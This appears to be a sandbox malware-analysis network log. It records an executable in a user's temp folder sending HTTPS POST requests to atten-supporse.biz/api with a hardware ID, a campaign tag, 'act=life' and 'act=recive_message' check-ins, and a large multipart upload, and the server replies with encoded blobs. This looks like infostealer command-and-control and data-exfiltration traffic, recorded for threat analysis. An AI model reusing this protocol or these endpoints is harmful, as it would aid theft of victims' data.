2024-12-09 23:43:43 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1B0KIILUQ6K User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20401 Host: atten-supporse.biz
2024-12-09 23:43:43 UTC	15331	OUT	Data Raw: 2d 2d 31 42 30 4b 49 49 4c 55 51 36 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 31 42 30 4b 49 49 4c 55 51 36 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 42 30 4b 49 49 4c 55 51 36 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 31 42 30 4b 49 49 4c 55 51 36 4b Data Ascii: --1B0KIILUQ6KContent-Disposition: form-data; name="hwid"8BEC93B31699AB4123D904AF30EFEBBC--1B0KIILUQ6KContent-Disposition: form-data; name="pid"3--1B0KIILUQ6KContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--1B0KIILUQ6K
2024-12-09 23:43:43 UTC	5070	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-09 23:43:44 UTC	1027	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ou2rn2q1knkuoapfmvdbu8j8ek; expires=Fri, 04-Apr-2025 17:30:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yTd5XBco%2BxUfvx%2BBFiykwBP7FfXWJoDvO%2FJ8%2FaaYXCjQnBmk9UEc2AlPEs6QhHHZs8dyj5wmocUK0RfTb2XnnksbbLuCUxbSTQ2Otw6%2FBZRtD5b%2BQYR1EJXO2E8YkxSIoo%2Bj0ZA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dbecea808c9c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1990&rtt_var=748&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21358&delivery_rate=1467336&cwnd=196&unsent_bytes=0&cid=d64c05d0baefed91&ts=915&x=0"
2024-12-09 23:43:44 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:43:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49884	104.21.80.1	443	4600	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:43:46 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: atten-supporse.biz
2024-12-09 23:43:46 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-09 23:43:46 UTC	1017	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5mved1uu85p57vqlv57fsrg2tn; expires=Fri, 04-Apr-2025 17:30:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mOM2WoRtk2w8ctNj756Z9g3x86gnnyqcUJb8kteyP%2BaeMV9KtUwUQP1jmu%2BkRGHcSTqaiRfxFM%2FynkLDCmNoKOzyhZ5LUm%2BO9QYhs9sn53cV2b6lMQVV5LKJxKhaTitc1VynYPE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dbfa1a9a429d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1551&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1801357&cwnd=246&unsent_bytes=0&cid=d596870379c45ebb&ts=717&x=0"
2024-12-09 23:43:46 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-09 23:43:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49888	104.21.80.1	443	5796	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:43:47 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JIBRY5KWOSREO1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1282 Host: atten-supporse.biz
2024-12-09 23:43:47 UTC	1282	OUT	Data Raw: 2d 2d 4a 49 42 52 59 35 4b 57 4f 53 52 45 4f 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4a 49 42 52 59 35 4b 57 4f 53 52 45 4f 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 49 42 52 59 35 4b 57 4f 53 52 45 4f 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4a 49 Data Ascii: --JIBRY5KWOSREO1Content-Disposition: form-data; name="hwid"8BEC93B31699AB4123D904AF30EFEBBC--JIBRY5KWOSREO1Content-Disposition: form-data; name="pid"1--JIBRY5KWOSREO1Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--JI
2024-12-09 23:43:48 UTC	1022	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cq644b92tmgophp56n6nghqtfq; expires=Fri, 04-Apr-2025 17:30:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=he4XSC37S7DdC%2Fmj5gWj%2B%2BljkkQc9jItjBcjmurWLm12rhEhJBDpErjHoG0mXzl5E%2Ft1HZYrj8HBXbP6FgoUP%2FHjJ37x7OoTFQctLLrK%2FgSgyOZCNYapruhEPGhneV12q2oKkM0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dc02adc8429d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1563&rtt_var=611&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2197&delivery_rate=1755862&cwnd=246&unsent_bytes=0&cid=f664f17f997b2ff3&ts=605&x=0"
2024-12-09 23:43:48 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:43:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49889	104.21.80.1	443	4600	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:43:48 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: atten-supporse.biz
2024-12-09 23:43:48 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-09 23:43:48 UTC	1015	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9f7gjhpuclf0qfedloivbup5if; expires=Fri, 04-Apr-2025 17:30:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bnysTD%2FhpzgwMGFc7mQUmJtiereBd7bsavU3HhwiD6hePPnj9%2BoG0Px1SkaVmRDY2VYBTqEttORJxIEI2JH5Z4TXnOqUqsUzy1Ddmkt%2FbEOxGs29Fth6sEX2xYHeUR%2FIWjjJB7c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dc07583443df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1542&min_rtt=1542&rtt_var=771&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4232&recv_bytes=955&delivery_rate=52041&cwnd=243&unsent_bytes=0&cid=6afcb1607db6f63c&ts=791&x=0"
2024-12-09 23:43:48 UTC	354	IN	Data Raw: 34 65 35 0d 0a 67 42 31 30 57 7a 78 43 55 2b 71 41 55 6c 79 59 49 31 39 6c 57 51 6c 4d 55 65 4f 4d 46 4b 79 6a 76 44 4a 79 62 4b 55 35 76 50 6e 37 50 77 4a 35 42 6e 5a 2f 79 50 4d 33 66 71 4a 58 4c 52 41 38 4a 57 34 77 68 36 34 75 79 73 4c 51 51 52 64 41 68 30 2f 52 32 37 70 37 46 54 64 50 4a 33 2f 49 35 53 70 2b 6f 6e 67 6b 52 7a 78 6e 62 6d 76 42 36 58 37 4f 77 74 42 51 45 77 66 4b 53 64 43 61 36 48 45 54 4d 31 6b 68 4e 34 76 73 50 7a 6e 39 52 6a 34 50 4e 32 41 68 4f 59 36 75 4f 49 37 47 78 68 42 49 54 75 68 63 79 4a 6a 4e 66 41 63 77 48 6a 39 2f 6b 61 49 33 4d 72 6f 5a 66 51 51 38 61 79 41 33 68 2b 64 38 78 4d 76 59 55 52 59 47 31 56 44 61 6b 65 68 2f 45 44 4a 54 4b 43 4f 47 35 6a 67 79 2b 30 77 2b 52 33 55 72 4b 53 76 42 74 6a 61 64 38 39 31 42 41 52 Data Ascii: 4e5gB10WzxCU+qAUlyYI19lWQlMUeOMFKyjvDJybKU5vPn7PwJ5BnZ/yPM3fqJXLRA8JW4wh64uysLQQRdAh0/R27p7FTdPJ3/I5Sp+ongkRzxnbmvB6X7OwtBQEwfKSdCa6HETM1khN4vsPzn9Rj4PN2AhOY6uOI7GxhBITuhcyJjNfAcwHj9/kaI3MroZfQQ8ayA3h+d8xMvYURYG1VDakeh/EDJTKCOG5jgy+0w+R3UrKSvBtjad891BAR
2024-12-09 23:43:48 UTC	906	IN	Data Raw: 54 47 61 36 6a 73 31 2f 31 4d 32 44 6a 5a 6d 4c 6a 36 4c 34 58 58 4f 78 74 52 61 48 77 54 44 56 74 4f 64 34 6e 39 57 64 78 34 6e 4b 63 69 36 63 42 33 2f 55 54 6f 4c 4c 53 6b 55 63 35 36 67 62 34 37 47 30 68 42 49 54 73 39 65 33 5a 6a 70 63 42 55 78 56 54 49 78 6d 75 51 39 4f 2b 68 48 4f 41 6b 78 61 44 77 35 6a 2b 68 31 78 38 72 58 56 52 63 4b 68 78 57 65 6e 50 6f 2f 54 6e 6c 2f 4c 54 71 45 36 43 63 2b 75 6c 35 7a 48 6e 74 73 49 6e 50 5a 72 6e 4c 50 78 64 39 55 48 67 44 44 56 39 69 56 37 33 41 51 4d 31 34 6e 4f 34 44 71 4d 54 50 78 54 6a 30 43 4e 6d 38 6f 50 34 44 72 4e 6f 43 42 32 55 68 51 56 6f 64 31 32 5a 6a 77 50 53 4d 36 55 43 34 32 6e 71 49 76 63 4f 4d 42 4f 67 74 37 4d 32 34 39 68 4f 46 6b 7a 39 50 62 58 67 49 43 77 6c 33 54 6d 4f 78 2f 45 7a 35 54 Data Ascii: TGa6js1/1M2DjZmLj6L4XXOxtRaHwTDVtOd4n9Wdx4nKci6cB3/UToLLSkUc56gb47G0hBITs9e3ZjpcBUxVTIxmuQ9O+hHOAkxaDw5j+h1x8rXVRcKhxWenPo/Tnl/LTqE6Cc+ul5zHntsInPZrnLPxd9UHgDDV9iV73AQM14nO4DqMTPxTj0CNm8oP4DrNoCB2UhQVod12ZjwPSM6UC42nqIvcOMBOgt7M249hOFkz9PbXgICwl3TmOx/Ez5T
2024-12-09 23:43:48 UTC	1369	IN	Data Raw: 34 34 33 37 0d 0a 6b 77 38 44 44 4e 74 49 7a 69 4f 34 58 48 47 77 74 4a 56 48 51 32 48 46 5a 36 63 2b 6a 39 4f 65 58 73 75 4d 70 6e 7a 63 67 76 35 54 7a 4d 41 4c 53 73 78 66 5a 69 75 63 63 4b 42 68 68 41 61 43 63 42 66 30 35 48 68 65 78 49 30 55 53 6b 34 67 66 41 36 4d 76 52 54 4d 41 30 2b 5a 53 49 32 6a 75 35 33 7a 38 2f 55 57 31 42 41 68 31 7a 47 32 37 6f 2f 4f 54 52 4f 4d 6a 75 44 38 33 49 4c 2b 55 38 7a 41 43 30 72 4d 58 32 59 72 6e 48 43 67 59 59 51 47 77 6a 4c 56 39 36 64 38 48 45 5a 4b 31 51 79 4e 59 62 6d 50 44 44 7a 54 44 49 43 4b 57 38 75 49 59 44 72 63 63 44 4d 7a 46 56 51 51 49 64 63 78 74 75 36 50 79 77 4e 57 54 41 67 6a 36 41 46 50 66 52 50 4f 68 46 37 64 47 41 71 77 65 6c 36 6a 70 6d 65 55 78 77 44 7a 6c 37 52 69 65 68 7a 46 79 74 5a 4b 54 Data Ascii: 4437kw8DDNtIziO4XHGwtJVHQ2HFZ6c+j9OeXsuMpnzcgv5TzMALSsxfZiuccKBhhAaCcBf05HhexI0USk4gfA6MvRTMA0+ZSI2ju53z8/UW1BAh1zG27o/OTROMjuD83IL+U8zAC0rMX2YrnHCgYYQGwjLV96d8HEZK1QyNYbmPDDzTDICKW8uIYDrccDMzFVQQIdcxtu6PywNWTAgj6AFPfRPOhF7dGAqwel6jpmeUxwDzl7RiehzFytZKT
2024-12-09 23:43:48 UTC	1369	IN	Data Raw: 4f 2f 35 4e 4e 77 63 2b 65 53 59 31 68 75 4a 2b 79 38 37 59 56 52 30 4a 7a 46 6a 4d 69 65 46 37 47 44 55 65 62 6e 47 50 2b 6e 42 6d 75 6d 51 71 42 43 74 74 4c 58 4f 65 6f 47 2b 4f 78 74 49 51 53 45 37 48 56 64 4b 51 35 58 51 64 50 56 6f 67 50 49 50 73 50 6a 66 32 53 54 45 41 4b 57 59 72 4f 34 76 6e 63 38 4c 4d 33 55 49 54 44 34 63 56 6e 70 7a 36 50 30 35 35 65 52 4d 47 71 36 49 76 63 4f 4d 42 4f 67 74 37 4d 32 34 79 69 65 6c 34 79 74 50 51 51 68 34 4a 78 31 33 57 6b 2b 56 7a 47 44 64 4d 4b 44 43 49 37 44 38 32 38 30 55 38 41 7a 39 6e 4b 58 50 50 72 6e 48 57 67 59 59 51 4f 41 33 64 51 5a 79 31 36 58 38 52 4b 55 67 37 63 5a 65 73 4b 58 37 39 54 58 31 66 65 32 38 6c 4f 59 6a 74 66 38 72 4d 33 6c 6b 66 42 38 39 57 31 6f 6e 6a 64 51 51 39 57 79 45 2b 67 75 59 Data Ascii: O/5NNwc+eSY1huJ+y87YVR0JzFjMieF7GDUebnGP+nBmumQqBCttLXOeoG+OxtIQSE7HVdKQ5XQdPVogPIPsPjf2STEAKWYrO4vnc8LM3UITD4cVnpz6P055eRMGq6IvcOMBOgt7M24yiel4ytPQQh4Jx13Wk+VzGDdMKDCI7D8280U8Az9nKXPPrnHWgYYQOA3dQZy16X8RKUg7cZesKX79TX1fe28lOYjtf8rM3lkfB89W1onjdQQ9WyE+guY
2024-12-09 23:43:48 UTC	1369	IN	Data Raw: 6a 55 56 4f 32 59 75 49 5a 50 6f 66 63 43 42 6b 42 41 58 46 6f 63 44 6e 71 72 31 64 46 59 6d 45 44 6c 78 6a 2b 35 77 5a 72 70 43 4e 77 6f 31 65 53 6f 31 69 75 31 34 78 73 54 57 56 42 6f 44 79 46 44 55 6b 75 70 2f 47 54 78 57 4b 7a 65 47 34 7a 59 79 39 77 46 7a 52 7a 78 7a 62 6d 76 42 79 57 7a 44 78 38 6c 42 4a 51 6e 48 43 70 36 45 72 47 5a 57 50 6c 4a 67 61 63 6a 76 50 44 54 33 52 44 6b 50 50 47 67 76 50 34 58 6a 65 38 72 49 32 6c 55 43 48 4d 46 56 33 70 54 73 63 42 6f 72 55 43 55 78 68 4b 4a 2b 66 76 31 5a 66 56 39 37 57 6a 6b 7a 77 66 45 34 31 34 48 5a 58 46 42 57 68 31 54 54 69 65 35 77 46 6a 68 64 4a 44 71 50 35 44 59 2f 2b 55 51 2b 41 6a 31 71 4c 6a 2b 4c 36 58 37 45 7a 39 4e 57 46 41 6a 42 47 35 44 62 35 57 64 57 59 52 34 53 50 49 62 72 4d 7a 6a 33 Data Ascii: jUVO2YuIZPofcCBkBAXFocDnqr1dFYmEDlxj+5wZrpCNwo1eSo1iu14xsTWVBoDyFDUkup/GTxWKzeG4zYy9wFzRzxzbmvByWzDx8lBJQnHCp6ErGZWPlJgacjvPDT3RDkPPGgvP4Xje8rI2lUCHMFV3pTscBorUCUxhKJ+fv1ZfV97WjkzwfE414HZXFBWh1TTie5wFjhdJDqP5DY/+UQ+Aj1qLj+L6X7Ez9NWFAjBG5Db5WdWYR4SPIbrMzj3
2024-12-09 23:43:48 UTC	1369	IN	Data Raw: 52 76 4c 6a 7a 42 6f 44 62 4a 32 5a 34 49 55 43 37 4d 54 66 2b 56 36 57 31 57 4a 68 41 35 63 59 2f 75 63 47 61 36 54 7a 51 47 4d 32 55 69 4f 34 58 38 64 73 58 49 30 56 45 66 44 73 52 61 31 4a 50 77 65 52 59 79 56 69 63 35 6a 4f 77 69 50 2f 55 42 63 30 63 38 63 32 35 72 77 64 39 67 79 63 62 52 45 6a 6b 4a 33 46 72 55 6d 4f 6c 7a 56 69 59 51 4f 58 47 50 37 6e 42 6d 75 6b 77 78 43 6a 39 35 49 6a 4f 42 35 33 48 45 30 39 46 66 48 51 33 48 58 73 79 61 38 48 41 64 50 46 30 6b 50 6f 66 75 4f 44 53 36 44 33 30 41 49 79 74 32 63 36 33 74 5a 38 53 44 2b 55 6f 47 43 63 74 4b 31 5a 62 75 50 77 6c 33 52 32 41 32 68 4b 4a 6f 66 76 70 41 4d 42 55 2b 61 69 51 35 6a 4f 5a 35 79 38 54 52 56 42 51 46 79 55 6e 51 6c 4f 4a 35 48 54 68 62 49 7a 71 43 37 44 6b 73 75 67 39 39 41 Data Ascii: RvLjzBoDbJ2Z4IUC7MTf+V6W1WJhA5cY/ucGa6TzQGM2UiO4X8dsXI0VEfDsRa1JPweRYyVic5jOwiP/UBc0c8c25rwd9gycbREjkJ3FrUmOlzViYQOXGP7nBmukwxCj95IjOB53HE09FfHQ3HXsya8HAdPF0kPofuODS6D30AIyt2c63tZ8SD+UoGCctK1ZbuPwl3R2A2hKJofvpAMBU+aiQ5jOZ5y8TRVBQFyUnQlOJ5HThbIzqC7Dksug99A
2024-12-09 23:43:48 UTC	1369	IN	Data Raw: 32 69 2b 4a 36 7a 38 6e 58 57 68 55 4c 77 56 48 64 6c 65 31 2b 47 6a 31 58 4c 6a 6a 49 72 48 41 35 34 67 46 6c 52 77 31 37 4b 53 75 4d 2f 6a 54 38 77 73 39 42 42 51 50 58 58 5a 79 30 34 58 4d 56 50 46 6b 77 63 5a 65 73 4b 58 37 39 54 58 31 66 65 32 73 71 50 34 4c 70 65 4d 48 4d 30 56 63 62 41 63 31 56 7a 4a 54 6e 64 78 6f 78 55 7a 49 37 67 76 41 35 4e 2f 64 50 4e 52 55 34 4b 32 42 7a 68 76 59 32 6c 6f 48 73 57 68 4d 43 30 56 62 52 32 2f 30 78 44 33 6c 5a 4c 48 48 51 6f 69 49 73 2b 6b 6f 39 41 44 56 35 4c 7a 75 4f 35 48 62 49 79 74 52 54 47 51 72 4a 55 74 69 61 37 33 34 58 4f 56 73 67 4f 4a 72 76 63 48 43 36 52 69 56 48 59 79 73 5a 50 34 72 66 64 64 69 42 77 52 34 4a 54 73 42 58 6e 73 4f 69 66 67 51 30 56 69 51 78 68 65 51 37 50 2f 74 43 50 51 63 34 61 79 Data Ascii: 2i+J6z8nXWhULwVHdle1+Gj1XLjjIrHA54gFlRw17KSuM/jT8ws9BBQPXXZy04XMVPFkwcZesKX79TX1fe2sqP4LpeMHM0VcbAc1VzJTndxoxUzI7gvA5N/dPNRU4K2BzhvY2loHsWhMC0VbR2/0xD3lZLHHQoiIs+ko9ADV5LzuO5HbIytRTGQrJUtia734XOVsgOJrvcHC6RiVHYysZP4rfddiBwR4JTsBXnsOifgQ0ViQxheQ7P/tCPQc4ay
2024-12-09 23:43:48 UTC	1369	IN	Data Raw: 64 64 7a 54 32 46 4d 47 44 59 42 6c 34 4c 76 70 61 52 63 30 56 53 77 50 74 76 63 7a 4d 50 52 47 4b 78 5a 37 4a 57 34 38 77 62 5a 50 6a 6f 6d 65 62 31 35 4f 33 78 75 47 32 39 64 38 47 44 64 5a 4e 69 44 46 77 6a 73 6f 2b 30 77 32 43 33 6c 71 49 79 4f 47 72 6a 69 4f 78 35 34 49 51 45 43 48 58 38 2f 62 75 69 39 45 59 67 74 7a 5a 74 69 77 4c 33 44 6a 41 53 74 48 59 7a 6c 67 63 35 4f 75 4c 6f 36 47 33 55 49 43 43 4d 52 4e 33 64 7a 63 51 54 59 79 55 69 4d 39 69 65 56 77 63 4c 70 4f 66 56 38 43 4b 79 30 68 6b 36 46 6e 32 4d 7a 4f 56 31 77 47 31 6c 62 53 32 36 77 2f 57 6a 31 56 4c 44 53 50 38 6e 38 73 36 6b 6f 78 45 58 64 76 50 48 50 50 72 6d 66 46 7a 73 78 65 46 30 48 57 54 64 4f 4c 34 58 6f 52 64 56 59 78 50 49 53 69 66 6e 37 76 53 6a 45 42 4e 6e 35 68 49 70 66 Data Ascii: ddzT2FMGDYBl4LvpaRc0VSwPtvczMPRGKxZ7JW48wbZPjomeb15O3xuG29d8GDdZNiDFwjso+0w2C3lqIyOGrjiOx54IQECHX8/bui9EYgtzZtiwL3DjAStHYzlgc5OuLo6G3UICCMRN3dzcQTYyUiM9ieVwcLpOfV8CKy0hk6Fn2MzOV1wG1lbS26w/Wj1VLDSP8n8s6koxEXdvPHPPrmfFzsxeF0HWTdOL4XoRdVYxPISifn7vSjEBNn5hIpf
2024-12-09 23:43:48 UTC	1369	IN	Data Raw: 74 42 62 42 67 6d 48 5a 4a 44 62 2b 6a 39 4f 65 57 73 6a 50 34 62 6c 4a 69 2b 33 5a 7a 34 41 50 57 67 67 4a 4a 43 75 4f 49 37 48 6e 67 68 43 51 49 64 66 7a 39 75 36 4c 30 52 69 43 33 4e 6d 32 4c 41 76 63 4f 4d 42 4b 30 64 6a 4f 47 42 7a 6b 36 34 75 6a 6f 62 51 58 52 45 4e 79 56 6a 4d 69 65 52 38 41 44 6f 5a 48 67 2b 74 37 7a 30 37 39 45 59 44 4f 52 70 68 50 6a 36 4f 36 55 6a 77 39 73 39 58 41 45 7a 68 57 4d 69 59 6f 6a 46 57 49 52 35 34 63 61 6e 6f 49 44 50 31 52 6e 31 4a 65 32 39 75 61 38 48 4c 65 38 50 45 30 46 64 53 4c 38 31 4c 30 35 54 6c 50 31 68 35 55 6d 42 70 79 4f 4d 36 4c 76 64 4f 4f 6b 73 38 63 53 6c 7a 7a 36 35 34 6a 70 6d 65 55 52 6f 65 79 6c 54 5a 31 2b 52 78 47 48 6c 42 62 69 6a 49 39 48 42 6d 71 51 39 39 46 58 73 7a 62 6e 53 50 34 33 66 4e Data Ascii: tBbBgmHZJDb+j9OeWsjP4blJi+3Zz4APWggJJCuOI7HnghCQIdfz9u6L0RiC3Nm2LAvcOMBK0djOGBzk64ujobQXRENyVjMieR8ADoZHg+t7z079EYDORphPj6O6Ujw9s9XAEzhWMiYojFWIR54canoIDP1Rn1Je29ua8HLe8PE0FdSL81L05TlP1h5UmBpyOM6LvdOOks8cSlzz654jpmeURoeylTZ1+RxGHlBbijI9HBmqQ99FXszbnSP43fN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49895	104.21.80.1	443	5796	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:43:50 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CJRB4ME2N User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 566875 Host: atten-supporse.biz
